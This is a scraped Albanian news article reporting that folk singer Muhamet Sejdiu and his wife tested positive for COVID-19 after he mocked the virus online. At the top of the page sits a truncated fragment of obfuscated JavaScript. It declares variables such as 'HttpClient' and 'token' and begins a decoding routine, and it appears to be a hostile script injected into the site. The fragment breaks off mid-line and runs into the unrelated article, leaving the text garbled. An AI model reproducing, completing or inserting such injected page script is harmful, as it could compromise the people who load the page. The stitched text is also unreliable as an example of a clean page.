;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dhjetë ditë më parë, këngëtari Sejdiu ironizonte me coronavirus-in

By

Mbrëmë vonë u bë i ditur lajmi se këngëtari i muzikës popullore Muhamet Sejdiu ka rezultuar pozitiv me COVID-19 bashkë me gruan e tij.

Ai ishte kthyer nga Gjermania ku kishte performuar në ahengjet që organizohen për 8 Mars teksa vazhdoi edhe në evente të tjera bashkë me Xenin kur u kthye në Kosovë.

A rrezikon Xeni? Dalin fotot pa distancën e nevojshme me kolegun pozitiv me COVID-19

E rreth kësaj date kur edhe supozohet se ishte infektuar me COVID-19, Sejdiu përmes rrjeteve sociale kishte ironizuar me coronavirusin.

Ai kishte postuar një prej shakave që u bënë virale në ditët kur pothuajse të gjitha shtetet kishin tashmë raste me COVID-19 përpos Kosovës.

‘Vjen edhe një tërheqje: Coronavirusi nuk e njeh Kosovën’ – kishte deklaruar ai shoqëruar me të qeshura.

Fatkeqësisht, humori nuk zgjati shumë dhe rastet e para të cilat kanë kurbë të rritjes nga dita në ditë po regjistrohen në vendin tonë duke mos kursyer as figurat publike që në ditët e para zgjodhën të mos e marrin seriozisht pandeminë. /Prive.al

Artikuj të ngjashëm